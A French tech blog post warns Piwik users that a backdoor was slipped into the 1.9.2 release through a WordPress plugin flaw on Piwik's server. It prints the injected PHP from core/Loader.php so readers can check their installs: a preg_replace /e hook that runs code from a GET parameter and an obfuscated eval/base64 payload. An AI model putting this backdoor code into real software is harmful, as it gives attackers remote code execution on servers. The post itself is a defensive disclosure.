Skip to content
Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Piwik – Attention à la backdoor

Chers amis, attention si vous utilisez Piwik comme outil de stats sur votre serveur. En effet, si vous avez installé ou mis à jour vers la version 1.9.2 du 26 novembre entre 16h43 et 00h59 , il se peut que vous ayez installé une version de Piwik contenant une backdoor. Le pirate a profité d’un bug dans un plugin WordPress présent sur le serveur de Piwik pour placer son code dans les sources du projet.

Pour être certain que votre installation n’est pas piégée, ouvrez le fichier

core/Loader.php

et si vous ne voyez pas ce qui suit dedans, vous êtes tranquille.

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/
OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWb
Uo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle
/aIYEL0YWE$

Sinon, rendez-vous sur le blog de Piwik pour comprendre comment vous débarrasser de cette backdoor qui pourrait permettre à un pirate d’avoir accès à votre serveur.

Source


A la recherche d’un job dans le numérique et envie de changer de région et de vie ?

Est-ce que je fais vraiment le boulot que j’aime ? Ma qualité de vie dans cette grosse ville bruyante, polluée, chère … est-elle vraiment la meilleure ? Est-ce que ce village de campagne est le lieu le plus propice pour préparer mes enfants au futur ? Nous sommes nombreux à nous être posé ce genre de questions à un moment ou un autre, moi le premier.

Et bien si vous êtes dans cette situation, que vous avez envie de changer d’air sans pour autant changer de travail, Laou vous accompagne dans toutes les étapes de ce nouveau voyage, pour que vous ayez l’esprit serein jusqu’au moment d’envoyer votre premier mail pro 😉

Découvrir leur service et lancez-vous



Les articles du moment